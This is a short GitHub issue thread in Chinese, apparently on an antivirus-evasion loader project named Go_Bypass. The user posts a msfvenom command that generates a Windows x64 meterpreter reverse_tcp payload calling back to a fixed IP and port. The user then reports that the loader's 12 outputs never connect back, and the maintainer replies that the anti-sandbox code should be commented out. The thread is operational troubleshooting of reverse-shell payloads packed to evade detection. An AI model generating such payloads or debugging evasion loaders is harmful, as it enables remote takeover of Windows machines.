### ISSUE TITLE
kali自带的msf无法上线

### ISSUE THREAD

**Issue by websecer** [Arks7/Go_Bypass#30]
生成：
`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=123.123.12.31 LPORT=9999 -f raw -o msf.bin`

然后执行go项目输入文件路径，一路回车，生成的12都无法上线

**Comment by websecer** [comment]
kali跑在vultr上，测试的win10也在vultr上

**Comment by Arks7** [comment]
把反沙箱的代码注释了在 跑
